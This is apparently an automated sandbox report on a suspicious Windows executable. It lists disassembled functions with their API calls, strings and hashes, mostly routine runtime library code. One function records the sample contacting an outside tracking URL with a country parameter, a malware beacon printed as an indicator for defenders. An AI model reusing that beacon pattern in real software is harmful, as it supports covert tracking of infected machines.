Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0065A9EC,?,00000000,?,0065CDE6,0063247E,00000000,?,00451F20), ref: 00662145
_free.LIBCMT ref: 00662178
_free.LIBCMT ref: 006621A0
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006621AD
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006621B9

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction ID: a0dfab90ba2c2447e3c0d55af65669a910a0d0bf0a495f3b2df164c504742a6b
Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction Fuzzy Hash: 32F0A935549F0237D3562734EC56A9A762B5BC3FA3F250128FB15D23D1EE618906412D

Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
_free.LIBCMT ref: 00431F11
_free.LIBCMT ref: 00431F39
SetLastError.KERNEL32(00000000), ref: 00431F46
SetLastError.KERNEL32(00000000), ref: 00431F52

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D

Function 00647B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006429A4: TlsGetValue.KERNEL32(?,?,00640DC2,00642ECF,00000000,?,00640DA0,?,?,?,00000000,?,00000000), ref: 006429AA

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 00647BB1

Part of subcall function 0065121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00651241
Part of subcall function 0065121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0065125A
Part of subcall function 0065121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 006512D0
Part of subcall function 0065121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 006512D8

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00647BBF
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00647BC9
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00647BD3
__CxxThrowException@8.LIBVCRUNTIME ref: 00647BF1

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 689f78734e539a3e64f9a8efc9d996cb286ce542c1c28c1ba7a260a43f32a67e
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: C1F04631A002182BCF55FB75C86296EF627CFC0B10F14016EF80093742DF25DE4586D9

Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A

Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041798A

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD

Function 0066A0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0066A0C4

Part of subcall function 006636D1: HeapFree.KERNEL32(00000000,00000000,?,0066A35F,?,00000000,?,00000000,?,0066A603,?,00000007,?,?,0066A9F7,?), ref: 006636E7
Part of subcall function 006636D1: GetLastError.KERNEL32(?,?,0066A35F,?,00000000,?,00000000,?,0066A603,?,00000007,?,?,0066A9F7,?,?), ref: 006636F9

_free.LIBCMT ref: 0066A0D6
_free.LIBCMT ref: 0066A0E8
_free.LIBCMT ref: 0066A0FA
_free.LIBCMT ref: 0066A10C

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 69af1058eb43de6e4f12ed5798101fa6a931e3c5625150c9ba9151df40eabc8b
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: EAF09632505310BB86A0EB94E8C3C5673DBBA01350B740959F008E7B12CB71FC908E6E

Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439E5D

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00439E6F
_free.LIBCMT ref: 00439E81
_free.LIBCMT ref: 00439E93
_free.LIBCMT ref: 00439EA5

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D

Function 0064CF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0064CF36
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0064CF67
GetCurrentThread.KERNEL32 ref: 0064CF70
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0064CF83
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0064CF8C

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 7a4d759b8d26dca6aeb99fea2eb47217d8a1a8774a19c212665b49a7a8d2cb9f
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: ADF0A036200510EBC7E5EF20FA508BAB3B7AFC4720310450CF58B06792CF26A90AD765

Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
GetCurrentThread.KERNEL32 ref: 0041CD09
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A

Function 00632E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 00632E8E

Part of subcall function 00631321: _wcslen.LIBCMT ref: 00631328
Part of subcall function 00631321: _wcslen.LIBCMT ref: 00631344

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 006330A1

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 00632EBE, 00632FEA, 00633059
&cc=DE, xrefs: 0063301B, 00633021, 0063307E

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: InternetOpen_wcslen
String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
API String ID: 3381584094-4083784958
Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction ID: a13fc8f2a2c8418640559d8eaa404d86b96a0e0e0a27e871de9297be1753c95a
Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction Fuzzy Hash: 365153A5A55344A9E320EFB0BC46B723378FF58712F10543AE518CB2B2E7B1DA44875E

Function 00664582 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006646DB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006646F0

Strings

]Ef, xrefs: 006645FD
]Ef, xrefs: 006646EA

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: ]Ef$]Ef
API String ID: 885266447-4100109468
Opcode ID: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
Instruction ID: 074796e279599f43ecb47fecbed03574249f5fe9017b8c86031f173b49773f52
Opcode Fuzzy Hash: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
Instruction Fuzzy Hash: 8C515A71A00248AFCF19DF59C884AADBBB3EF86314F198259E819D7361DB319D51CB40

Function 00658937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0065896A
__IsNonwritableInCurrentImage.LIBCMT ref: 00658A23

Strings

fB, xrefs: 00658A15, 00658A1E, 00658A2F
csm, xrefs: 00658A0D

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 3480331319-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: c19504034ad3797b627038b946e6054a230fc35702baf654c5acef6e2576496b
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 4D41E934A00248DFCF10DF68C845AEE7BB6AF44329F148156ED156B792DB31D909CB55

Function 0065F97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\J18zxRjOes.exe,00000104), ref: 0065F9BA
_free.LIBCMT ref: 0065FA85
_free.LIBCMT ref: 0065FA8F

Strings

C:\Users\user\Desktop\J18zxRjOes.exe, xrefs: 0065F9B1, 0065F9B8, 0065F9E7, 0065FA1F

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\J18zxRjOes.exe
API String ID: 2506810119-3345307862
Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction ID: 2974d7fb34d4a7a7513ff4d22112d489560790f346c40ccf68ab3a37fa2fcff5
Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction Fuzzy Hash: 96317E71A00258EBDB21DF999C8599EBBFEEF99311F10407AEC0897312D6709A48CB95

Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\J18zxRjOes.exe,00000104), ref: 0042F753
_free.LIBCMT ref: 0042F81E
_free.LIBCMT ref: 0042F828

Strings

C:\Users\user\Desktop\J18zxRjOes.exe, xrefs: 0042F74A, 0042F751, 0042F780, 0042F7B8

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\J18zxRjOes.exe
API String ID: 2506810119-3345307862
Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98

Function 00669372 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00662141: GetLastError.KERNEL32(?,?,0065A9EC,?,00000000,?,0065CDE6,0063247E,00000000,?,00451F20), ref: 00662145
Part of subcall function 00662141: _free.LIBCMT ref: 00662178
Part of subcall function 00662141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006621B9

Part of subcall function 00669491: _free.LIBCMT ref: 006694F7

Part of subcall function 00669106: GetOEMCP.KERNEL32(00000000), ref: 00669131

_free.LIBCMT ref: 006693EA
_free.LIBCMT ref: 00669420

Strings

[o, xrefs: 00669469
[o, xrefs: 00669464

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: [o$ [o
API String ID: 3291180501-3164960917
Opcode ID: 7d1fb818511ec1419113701ffd95af3d24eb46c4dad09b2d518bc2ecea2a2184
Instruction ID: 6131532b3afc7001fc752cccc3c776901c3b1b31c213013f9706caa6e0115132
Opcode Fuzzy Hash: 7d1fb818511ec1419113701ffd95af3d24eb46c4dad09b2d518bc2ecea2a2184
Instruction Fuzzy Hash: D531E431904244AFDB10DF69D480BADB7FAEF40320F24419EED049B391EB729D41CB64

Function 0043910B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 0043922A: _free.LIBCMT ref: 00439290

Part of subcall function 00438E9F: GetOEMCP.KERNEL32(00000000), ref: 00438ECA

_free.LIBCMT ref: 00439183
_free.LIBCMT ref: 004391B9

Strings

[o, xrefs: 004391FD
[o, xrefs: 00439202

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free$ErrorLast
String ID: [o$ [o
API String ID: 3291180501-3164960917
Opcode ID: 7094f7a6166d3b52916982ff4af8da011b5f1965f4e91ecc92ce391d4defad9f
Instruction ID: 97d82b3a2133808e380870247b9945ea31129e8917de2cc4f3b867beb4678205
Opcode Fuzzy Hash: 7094f7a6166d3b52916982ff4af8da011b5f1965f4e91ecc92ce391d4defad9f
Instruction Fuzzy Hash: 63312731904205AFEF10EF99D444A5EB7F1EF48324F14119FE80467391DB799E40CB48

Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E

Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E

Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
__CxxThrowException@8.LIBVCRUNTIME ref: 00424319

Strings

pScheduler, xrefs: 00424303

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 1381464787-923244539
Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D

Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
__CxxThrowException@8.LIBVCRUNTIME ref: 0041E660

Strings

pContext, xrefs: 0041E64A

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1990795212-2046700901
Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8

Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
_free.LIBCMT ref: 0042E069

Strings

B, xrefs: 0042E043, 0042E068

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: CloseFreeHandleLibrary_free
String ID: B
API String ID: 621396759-3071617958
Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98

Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
__CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8

Strings

pScheduler, xrefs: 00415DB2
version, xrefs: 00415D9F

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 1687795959-3154422776
Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E

Function 00665AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00665B8A
__alldvrm.LIBCMT ref: 00665D8B
__alldvrm.LIBCMT ref: 00665DAD

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction ID: 519887f3fc981d46a65f2d95e778288d0eb79e64236ac1e1ddfa629283f99740
Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction Fuzzy Hash: A3A15772900B869FDB25CF18C8977EEBBE2EF52310F1841AEE4869B381C6348941C754

Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00435923
__alldvrm.LIBCMT ref: 00435B24
__alldvrm.LIBCMT ref: 00435B46

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
